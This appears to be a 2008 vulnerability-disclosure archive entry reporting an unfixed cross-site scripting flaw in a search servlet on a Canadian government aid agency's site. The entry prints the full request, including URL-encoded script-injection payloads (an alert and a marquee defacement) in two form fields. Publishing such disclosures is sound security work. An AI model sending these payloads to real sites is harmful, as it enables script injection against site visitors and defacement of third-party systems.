Security researcher xylitol, has submitted on 08/06/2008 a cross-site-scripting (XSS) vulnerability affecting les.acdi-cida.gc.ca, which at the time of submission ranked 566 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 15/06/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
| Date submitted: 08/06/2008 |
Date published: 15/06/2008 |
Fixed? Mail us! | Status:  UNFIXED |
| Author: xylitol |
Domain: les.acdi-cida.gc.ca |
Category: XSS |
Pagerank: 566 |
|---|
URL: http://les.acdi-cida.gc.ca/servlet/JKMSearchController?desTemplateFile=CIDAWebAdvEn.htm&desClientLoc
ale=enUS&AppID=CIDAWebEn |
| POST: desClientLocale=enUS&AppID=CIDAWebEn&FormStatus=Ok&desTemplateFile=CIDAWebResultsEn.htm&DESGetPage=1 &DESReturnResults=Sorted&DESBoolean=AND&DESSortField=DocRank&DESMaxHits=500&DESTimeOut=60&DESCategor y-CIDA+Web=Yes&DESPageSize=10&DESConstraintName1=&DESConstraintOperator1=&DESConstraintValue1=&instB utton=All&DESQueryString=%28AND+%28AND+%22%27%3E%3C%2Ftitle%3E%3Cscript%3Ealert%281337%29%3C%2Fscrip t%3E%3E%3Cmarquee%3E%3Ch1%3EXSS%22%22by%22%22Xylitol%3C%2Fh1%3E%3C%2Fmarquee%3E%22%29%28OR+%28IN+%22 Type%22%221%22%29%28IN+%22Type%22%225%22%29%29%29&freeTxtFld=%27%22%3E%3C%2Ftitle%3E%3Cscript%3Ealer t%281337%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+Xylitol%3C%2Fh1%3E%3C%2Fmarquee%3E&SearchBu tton=Search&searchType=AND&DESSortOrder=Descending&DESTotalMaxHits=100&iDocDateRange=0 |
|
Click here to view the mirror
|
|
|
| 
